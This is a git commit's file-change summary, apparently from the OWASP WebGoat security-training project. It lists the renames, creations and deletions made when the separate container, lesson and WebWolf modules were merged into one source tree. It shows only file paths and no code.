 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/model/AssignmentStatusModel.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/model/FlagModel.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/model/FlagsCollection.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/model/HTMLContentModel.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/model/HintCollection.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/model/HintModel.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/model/LabelDebugModel.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/model/LessonContentModel.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/model/LessonInfoModel.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/model/LessonOverviewCollection.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/model/MenuCollection.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/model/MenuData.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/model/MenuModel.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/model/ReportCardModel.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/scoreboardApp.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/support/CustomGoat.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/support/GoatUtils.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/support/goatAsyncErrorHandler.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/support/goatConstants.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/templates/lesson_overview.html (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/templates/paging_controls.html (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/templates/report_card.html (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/templates/scoreboard.html (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/view/ErrorNotificationView.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/view/GoatRouter.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/view/HelpControlsView.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/view/HintView.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/view/LessonContentView.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/view/MenuButtonView.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/view/MenuItemView.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/view/MenuView.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/view/PaginationControlView.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/view/ReportCardView.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/view/ScoreboardView.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/view/TitleView.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/view/UserAndInfoView.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/jquery/jquery-1.10.2.min.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/jquery/jquery-ui-1.10.4.custom.min.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/jquery_form/jquery.form.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/libs/ace.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/libs/backbone-min.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/libs/bootstrap.min.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/libs/jquery-2.1.4.min.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/libs/jquery-base.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/libs/jquery-ui-1.10.4.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/libs/jquery-ui.min.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/libs/jquery-vuln.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/libs/jquery.form.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/libs/jquery.min.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/libs/mode-java.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/libs/polyglot.min.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/libs/require.min.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/libs/text.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/libs/theme-monokai.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/libs/underscore-min.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/main.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/modernizr.min.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/quiz.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/scoreboard.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/toggle.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/plugins/bootstrap-slider/css/slider.css (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/plugins/bootstrap-slider/js/bootstrap-slider.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/plugins/bootstrap-wysihtml5/css/bootstrap-wysihtml5.css (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/plugins/bootstrap-wysihtml5/css/bootstrap3-wysiwyg5-color.css (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/plugins/bootstrap-wysihtml5/js/bootstrap3-wysihtml5.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/plugins/bootstrap-wysihtml5/js/wysihtml5-0.3.0.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/plugins/bootstrap/css/bootstrap.min.css (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/plugins/bootstrap/fonts/glyphicons-halflings-regular.eot (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/plugins/bootstrap/fonts/glyphicons-halflings-regular.svg (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/plugins/bootstrap/fonts/glyphicons-halflings-regular.ttf (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/plugins/bootstrap/fonts/glyphicons-halflings-regular.woff (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/plugins/nanoScroller/jquery.nanoscroller.min.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/templates/about.html (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/templates/lesson_content.html (65%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/templates/login.html (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/templates/main_new.html (96%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/templates/registration.html (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/templates/scoreboard.html (100%)
 rename webwolf/src/main/resources/static/css/img/favicon.ico => src/main/resources/webwolf/static/css/img/webwolf.ico (100%)
 rename webwolf/src/main/resources/static/css/main.css => src/main/resources/webwolf/static/css/webwolf.css (100%)
 rename {webwolf/src/main/resources => src/main/resources/webwolf}/static/images/wolf.png (100%)
 create mode 100644 src/main/resources/webwolf/static/images/wolf.svg
 rename {webwolf/src/main/resources => src/main/resources/webwolf}/static/js/fileUpload.js (64%)
 rename {webwolf/src/main/resources => src/main/resources/webwolf}/static/js/jwt.js (100%)
 rename {webwolf/src/main/resources => src/main/resources/webwolf}/static/js/mail.js (100%)
 rename {webwolf/src/main/resources => src/main/resources/webwolf}/templates/error.html (100%)
 rename {webwolf/src/main/resources => src/main/resources/webwolf}/templates/files.html (93%)
 rename {webwolf/src/main/resources => src/main/resources/webwolf}/templates/fragments/footer.html (100%)
 rename {webwolf/src/main/resources => src/main/resources/webwolf}/templates/fragments/header.html (61%)
 rename {webwolf/src/main/resources => src/main/resources/webwolf}/templates/home.html (95%)
 rename {webwolf/src/main/resources => src/main/resources/webwolf}/templates/jwt.html (100%)
 rename {webwolf/src/main/resources => src/main/resources/webwolf}/templates/mailbox.html (100%)
 rename {webwolf/src/main/resources => src/main/resources/webwolf}/templates/registration.html (100%)
 rename {webwolf/src/main/resources => src/main/resources/webwolf}/templates/requests.html (100%)
 rename webwolf/src/main/resources/templates/login.html => src/main/resources/webwolf/templates/webwolf-login.html (100%)
 create mode 100644 src/test/java/org/owasp/webgoat/container/WebGoatApplication.java
 rename {webgoat-container/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/container}/assignments/AssignmentEndpointTest.java (77%)
 rename {webgoat-container/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/container}/plugins/LessonTest.java (59%)
 rename {webgoat-container/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/container}/service/HintServiceTest.java (86%)
 rename {webgoat-container/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/container}/service/LessonMenuServiceTest.java (89%)
 rename {webgoat-container/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/container}/service/LessonProgressServiceTest.java (89%)
 rename {webgoat-container/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/container}/service/ReportCardServiceTest.java (86%)
 rename {webgoat-container/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/container}/session/LabelDebuggerTest.java (95%)
 rename {webgoat-container/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/container}/session/LessonTrackerTest.java (93%)
 rename {webgoat-container/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/container}/users/UserRepositoryTest.java (79%)
 rename {webgoat-container/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/container}/users/UserServiceTest.java (83%)
 rename {webgoat-container/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/container}/users/UserTrackerRepositoryTest.java (91%)
 rename {webgoat-container/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/container}/users/UserValidatorTest.java (98%)
 rename {webgoat-lessons/auth-bypass/src/test/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/auth_bypass/BypassVerificationTest.java (78%)
 rename {webgoat-lessons/bypass-restrictions/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/bypass_restrictions/BypassRestrictionsFrontendValidationTest.java (84%)
 rename {webgoat-lessons/challenge/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/challenges/Assignment1Test.java (91%)
 rename {webgoat-lessons/chrome-dev-tools/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/chrome_dev_tools/ChromeDevToolsTest.java (86%)
 rename {webgoat-lessons/cia/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/cia/CIAQuizTest.java (94%)
 rename {webgoat-lessons/client-side-filtering/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/client_side_filtering/ClientSideFilteringAssignmentTest.java (79%)
 rename {webgoat-lessons/client-side-filtering/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/client_side_filtering/ClientSideFilteringFreeAssignmentTest.java (86%)
 rename {webgoat-lessons/client-side-filtering/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/client_side_filtering/ShopEndpointTest.java (89%)
 rename {webgoat-lessons/crypto/src/test/java/org/owasp/webgoat/crypto => src/test/java/org/owasp/webgoat/lessons/cryptography}/CryptoUtilTest.java (95%)
 rename {webgoat-lessons/csrf/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/csrf/CSRFFeedbackTest.java (93%)
 rename {webgoat-lessons/insecure-deserialization/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/deserialization/DeserializeTest.java (92%)
 rename {webgoat-lessons/hijack-session/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/hijacksession/HijackSessionAssignmentTest.java (93%)
 rename {webgoat-lessons/hijack-session/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/hijacksession/cas/HijackSessionAuthenticationProviderTest.java (93%)
 rename {webgoat-lessons/http-proxies/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/http_proxies/HttpBasicsInterceptRequestTest.java (89%)
 rename {webgoat-lessons/jwt/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/jwt/JWTDecodeEndpointTest.java (87%)
 rename {webgoat-lessons/jwt/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/jwt/JWTFinalEndpointTest.java (91%)
 rename {webgoat-lessons/jwt/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/jwt/JWTRefreshEndpointTest.java (97%)
 rename {webgoat-lessons/jwt/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/jwt/JWTSecretKeyEndpointTest.java (95%)
 rename {webgoat-lessons/jwt/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/jwt/JWTVotesEndpointTest.java (97%)
 rename {webgoat-lessons/jwt/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/jwt/TokenTest.java (98%)
 rename {webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/missing_ac/DisplayUserTest.java (87%)
 rename {webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/missing_ac/MissingFunctionACHiddenMenusTest.java (90%)
 rename {webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/missing_ac/MissingFunctionACUsersTest.java (85%)
 rename {webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/missing_ac/MissingFunctionACYourHashAdminTest.java (78%)
 rename {webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/missing_ac/MissingFunctionYourHashTest.java (88%)
 rename {webgoat-lessons/password-reset/src/main/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/password_reset/SecurityQuestionAssignmentTest.java (88%)
 rename {webgoat-lessons/path-traversal/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/path_traversal/ProfileUploadFixTest.java (89%)
 rename {webgoat-lessons/path-traversal/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/path_traversal/ProfileUploadRemoveUserInputTest.java (89%)
 rename {webgoat-lessons/path-traversal/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/path_traversal/ProfileUploadRetrievalTest.java (93%)
 rename {webgoat-lessons/path-traversal/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/path_traversal/ProfileUploadTest.java (93%)
 rename {webgoat-lessons/spoof-cookie/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/spoofcookie/SpoofCookieAssignmentTest.java (98%)
 rename {webgoat-lessons/spoof-cookie/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/spoofcookie/encoders/EncDecTest.java (96%)
 rename {webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/sql_injection/SqlLessonTest.java (83%)
 rename {webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/sql_injection/introduction/SqlInjectionLesson10Test.java (95%)
 rename {webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/sql_injection/introduction/SqlInjectionLesson2Test.java (93%)
 rename {webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/sql_injection/introduction/SqlInjectionLesson5Test.java (94%)
 rename {webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/sql_injection/introduction/SqlInjectionLesson5aTest.java (96%)
 rename {webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/sql_injection/introduction/SqlInjectionLesson6aTest.java (95%)
 rename {webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/sql_injection/introduction/SqlInjectionLesson6bTest.java (91%)
 rename {webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/sql_injection/introduction/SqlInjectionLesson8Test.java (96%)
 rename {webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/sql_injection/introduction/SqlInjectionLesson9Test.java (98%)
 rename {webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/sql_injection/mitigation/SqlInjectionLesson13Test.java (97%)
 rename {webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/sql_injection/mitigation/SqlOnlyInputValidationOnKeywordsTest.java (92%)
 rename {webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/sql_injection/mitigation/SqlOnlyInputValidationTest.java (91%)
 rename {webgoat-lessons/ssrf/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/ssrf/SSRFTest1.java (89%)
 rename {webgoat-lessons/ssrf/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/ssrf/SSRFTest2.java (92%)
 rename {webgoat-lessons/vulnerable-components/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/vulnerable_components/VulnerableComponentsLessonTest.java (94%)
 rename {webgoat-lessons/cross-site-scripting/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/xss/CrossSiteScriptingLesson1Test.java (96%)
 rename {webgoat-lessons/cross-site-scripting/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/xss/DOMCrossSiteScriptingTest.java (93%)
 rename {webgoat-lessons/cross-site-scripting/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/xss/StoredXssCommentsTest.java (96%)
 rename {webgoat-lessons/xxe/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/xxe/BlindSendFileAssignmentTest.java (62%)
 rename {webgoat-lessons/xxe/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/xxe/ContentTypeAssignmentTest.java (72%)
 rename {webgoat-lessons/xxe/src/test/java/org/owasp/webgoat => src/test/java/org/owasp/webgoat/lessons}/xxe/SimpleXXETest.java (95%)
 create mode 100644 src/test/java/org/owasp/webgoat/webwolf/WebWolfApplication.java
 rename {webwolf/src/test/java/org/owasp => src/test/java/org/owasp/webgoat}/webwolf/jwt/JWTTokenTest.java (98%)
 rename {webwolf/src/test/java/org/owasp => src/test/java/org/owasp/webgoat}/webwolf/mailbox/MailboxControllerTest.java (91%)
 rename {webwolf/src/test/java/org/owasp => src/test/java/org/owasp/webgoat}/webwolf/mailbox/MailboxRepositoryTest.java (88%)
 rename {webwolf/src/test/java/org/owasp => src/test/java/org/owasp/webgoat}/webwolf/user/UserServiceTest.java (98%)
 create mode 100644 src/test/resources/application-webgoat-test.properties
 rename webgoat-container/src/test/resources/application-test.properties => src/test/resources/application-webwolf.properties (58%)
 rename {webgoat-container/src => src}/test/resources/logback-test.xml (100%)
 rename docker/start.sh => start.sh (63%)
 delete mode 100644 webgoat-container/.gitignore
 delete mode 100644 webgoat-container/pom.xml
 delete mode 100644 webgoat-container/src/main/java/org/owasp/webgoat/DatabaseConfiguration.java
 delete mode 100644 webgoat-container/src/main/java/org/owasp/webgoat/service/LessonProgressService.java
 delete mode 100644 webgoat-container/src/test/java/org/owasp/webgoat/TestApplication.java
 delete mode 100644 webgoat-container/src/test/java/org/owasp/webgoat/service/LabelServiceTest.java
 delete mode 100644 webgoat-container/src/test/resources/org/owasp/webgoat/plugins/lessonSolutions/rewrite_test.html
 delete mode 100644 webgoat-integration-tests/pom.xml
 delete mode 100644 webgoat-integration-tests/src/test/java/org/owasp/webgoat/ChallengeTest.java
 delete mode 100644 webgoat-integration-tests/src/test/resources/application-inttest.properties
 delete mode 100644 webgoat-integration-tests/src/test/resources/logback-test.xml
 delete mode 100644 webgoat-lessons/auth-bypass/.DS_Store
 delete mode 100644 webgoat-lessons/auth-bypass/pom.xml
 delete mode 100644 webgoat-lessons/auth-bypass/src/.DS_Store
 delete mode 100644 webgoat-lessons/auth-bypass/src/main/.DS_Store
 delete mode 100644 webgoat-lessons/auth-bypass/src/main/java/.DS_Store
 delete mode 100644 webgoat-lessons/auth-bypass/src/main/java/org/.DS_Store
 delete mode 100644 webgoat-lessons/auth-bypass/src/main/java/org/owasp/.DS_Store
 delete mode 100644 webgoat-lessons/auth-bypass/src/main/java/org/owasp/webgoat/.DS_Store
 delete mode 100644 webgoat-lessons/auth-bypass/src/main/resources/.DS_Store
 delete mode 100644 webgoat-lessons/auth-bypass/src/main/resources/html/.DS_Store
 delete mode 100755 webgoat-lessons/bypass-restrictions/pom.xml
 delete mode 100644 webgoat-lessons/challenge/pom.xml
 delete mode 100644 webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge1/ImageServlet.java
 delete mode 100644 webgoat-lessons/challenge/src/main/resources/html/Challenge.html
 delete mode 100644 webgoat-lessons/chrome-dev-tools/pom.xml
 delete mode 100644 webgoat-lessons/cia/pom.xml
 delete mode 100644 webgoat-lessons/client-side-filtering/pom.xml
 delete mode 100644 webgoat-lessons/client-side-filtering/src/main/resources/lessonPlans/ru/ClientSideFiltering.html
 delete mode 100644 webgoat-lessons/cross-site-scripting/.gitignore
 delete mode 100644 webgoat-lessons/cross-site-scripting/.sonatype
 delete mode 100644 webgoat-lessons/cross-site-scripting/pom.xml
 delete mode 100644 webgoat-lessons/crypto/pom.xml
 delete mode 100644 webgoat-lessons/crypto/src/main/resources/lessonSolutions/en/crypto_solution.adoc
 delete mode 100644 webgoat-lessons/crypto/src/main/resources/lessonSolutions/html/crypto.html
 delete mode 100644 webgoat-lessons/csrf/pom.xml
 delete mode 100644 webgoat-lessons/csrf/src/.DS_Store
 delete mode 100644 webgoat-lessons/csrf/src/main/.DS_Store
 delete mode 100644 webgoat-lessons/csrf/src/main/java/.DS_Store
 delete mode 100644 webgoat-lessons/csrf/src/main/java/org/.DS_Store
 delete mode 100644 webgoat-lessons/csrf/src/main/java/org/owasp/.DS_Store
 delete mode 100644 webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/.DS_Store
 delete mode 100644 webgoat-lessons/csrf/src/main/resources/.DS_Store
 delete mode 100644 webgoat-lessons/csrf/src/main/resources/lessonPlans/.DS_Store
 delete mode 100644 webgoat-lessons/csrf/webgoat-lesson-template/.DS_Store
 delete mode 100644 webgoat-lessons/csrf/webgoat-lesson-template/src/.DS_Store
 delete mode 100644 webgoat-lessons/csrf/webgoat-lesson-template/src/main/.DS_Store
 delete mode 100644 webgoat-lessons/csrf/webgoat-lesson-template/src/main/java/.DS_Store
 delete mode 100644 webgoat-lessons/csrf/webgoat-lesson-template/src/main/java/org/.DS_Store
 delete mode 100644 webgoat-lessons/csrf/webgoat-lesson-template/src/main/java/org/owasp/.DS_Store
 delete mode 100644 webgoat-lessons/csrf/webgoat-lesson-template/src/main/java/org/owasp/webgoat/.DS_Store
 delete mode 100644 webgoat-lessons/csrf/webgoat-lesson-template/src/main/resources/.DS_Store
 delete mode 100644 webgoat-lessons/csrf/webgoat-lesson-template/src/main/resources/html/.DS_Store
 delete mode 100644 webgoat-lessons/hijack-session/pom.xml
 delete mode 100755 webgoat-lessons/html-tampering/pom.xml
 delete mode 100644 webgoat-lessons/http-basics/pom.xml
 delete mode 100644 webgoat-lessons/http-basics/src/main/resources/lessonPlans/de/HttpBasics.html
 delete mode 100644 webgoat-lessons/http-basics/src/main/resources/lessonPlans/nl/HttpBasics_content1.adoc
 delete mode 100644 webgoat-lessons/http-basics/src/main/resources/lessonPlans/ru/HttpBasics.html
 delete mode 100644 webgoat-lessons/http-basics/src/main/resources/lessonSolutions/en/HttpBasics_solution.adoc
 delete mode 100644 webgoat-lessons/http-basics/src/main/resources/lessonSolutions/html/HttpBasics.html
 delete mode 100644 webgoat-lessons/http-proxies/pom.xml
 delete mode 100644 webgoat-lessons/idor/pom.xml
 delete mode 100755 webgoat-lessons/insecure-deserialization/pom.xml
 delete mode 100755 webgoat-lessons/insecure-login/pom.xml
 delete mode 100644 webgoat-lessons/jwt/pom.xml
 delete mode 100755 webgoat-lessons/logging/pom.xml
 delete mode 100644 webgoat-lessons/missing-function-ac/.DS_Store
 delete mode 100644 webgoat-lessons/missing-function-ac/pom.xml
 delete mode 100644 webgoat-lessons/missing-function-ac/src/.DS_Store
 delete mode 100644 webgoat-lessons/missing-function-ac/src/main/.DS_Store
 delete mode 100644 webgoat-lessons/missing-function-ac/src/main/java/.DS_Store
 delete mode 100644 webgoat-lessons/missing-function-ac/src/main/java/org/.DS_Store
 delete mode 100644 webgoat-lessons/missing-function-ac/src/main/java/org/owasp/.DS_Store
 delete mode 100644 webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/.DS_Store
 delete mode 100644 webgoat-lessons/missing-function-ac/src/main/resources/.DS_Store
 delete mode 100644 webgoat-lessons/missing-function-ac/src/main/resources/html/.DS_Store
 delete mode 100644 webgoat-lessons/password-reset/pom.xml
 delete mode 100644 webgoat-lessons/path-traversal/pom.xml
 delete mode 100644 webgoat-lessons/pom.xml
 delete mode 100644 webgoat-lessons/secure-passwords/pom.xml
 delete mode 100644 webgoat-lessons/spoof-cookie/pom.xml
 delete mode 100644 webgoat-lessons/sql-injection/.sonatype
 delete mode 100644 webgoat-lessons/sql-injection/pom.xml
 delete mode 100644 webgoat-lessons/sql-injection/src/main/resources/lessonSolutions/en/SqlInjection_solution.adoc
 delete mode 100644 webgoat-lessons/sql-injection/src/main/resources/lessonSolutions/html/SqlInjection.html
 delete mode 100755 webgoat-lessons/ssrf/pom.xml
 delete mode 100644 webgoat-lessons/vulnerable-components/.gitignore
 delete mode 100644 webgoat-lessons/vulnerable-components/pom.xml
 delete mode 100644 webgoat-lessons/vulnerable-components/src/main/resources/lessonSolutions/en/VulnerableComponents_solution.adoc
 delete mode 100644 webgoat-lessons/vulnerable-components/src/main/resources/lessonSolutions/html/VulnerableComponents.html
 delete mode 100644 webgoat-lessons/webgoat-introduction/pom.xml
 delete mode 100644 webgoat-lessons/webgoat-introduction/src/main/resources/html/WebGoatIntroduction.html
 delete mode 100644 webgoat-lessons/webgoat-introduction/src/main/resources/lessonPlans/nl/Introduction.adoc
 delete mode 100644 webgoat-lessons/webgoat-lesson-template/.DS_Store
 delete mode 100644 webgoat-lessons/webgoat-lesson-template/getting-started.MD
 delete mode 100644 webgoat-lessons/webgoat-lesson-template/pom.xml
 delete mode 100644 webgoat-lessons/webgoat-lesson-template/src/.DS_Store
 delete mode 100644 webgoat-lessons/webgoat-lesson-template/src/main/.DS_Store
 delete mode 100644 webgoat-lessons/webgoat-lesson-template/src/main/java/.DS_Store
 delete mode 100644 webgoat-lessons/webgoat-lesson-template/src/main/java/org/.DS_Store
 delete mode 100644 webgoat-lessons/webgoat-lesson-template/src/main/java/org/owasp/.DS_Store
 delete mode 100644 webgoat-lessons/webgoat-lesson-template/src/main/java/org/owasp/webgoat/.DS_Store
 delete mode 100644 webgoat-lessons/webgoat-lesson-template/src/main/resources/.DS_Store
 delete mode 100644 webgoat-lessons/webgoat-lesson-template/src/main/resources/html/.DS_Store
 delete mode 100644 webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-content.adoc
 delete mode 100644 webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-glue.adoc
 delete mode 100644 webgoat-lessons/webwolf-introduction/pom.xml
